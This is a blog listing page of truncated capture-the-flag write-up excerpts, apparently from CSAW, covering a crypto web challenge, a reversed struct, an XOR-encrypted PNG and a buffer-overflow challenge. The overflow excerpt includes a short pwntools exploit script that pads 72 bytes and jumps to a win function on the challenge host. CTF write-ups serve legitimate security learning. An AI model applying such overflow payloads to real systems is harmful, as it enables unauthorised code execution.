We start out with just a link and a bit of text, the link points to http://crypto.chal.csaw.io:8001 – though this probably won’t live forever. Once you go to the page, you would probably notice a few things Looks like it’s from the early xp era Seems to be centered around some movie that it’s named… Read more »
There is a struct in this program. struct Rock{ void *fp; int pass_fail; string *user_input1; string *user_input2; string *flag_str; }; Three interesting functions, which I have called init_struct, check_len_and_xor, and is_valid_key See the rest of this writeup here.
This was a very easy challenge. Basically, there was a win function at the address that is bring printed : 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py from pwn import * win = 0x40060D payload = “A”*72 payload += p64(win) con = remote(‘pwn.chal.csaw.io’,8000) print con.recvline() print con.recvline()… Read more »
With this challenge, they gave us an encrypted png. After a bit of trial and error I realized all I had to do was xor the first few bytes of the encrypted file with the standard header of a png. I just downloaded a sample file. Here is my get_key.py ecrypted = open(‘sleeping.png’,’rb’).read().decode(‘base64’) png =… Read more »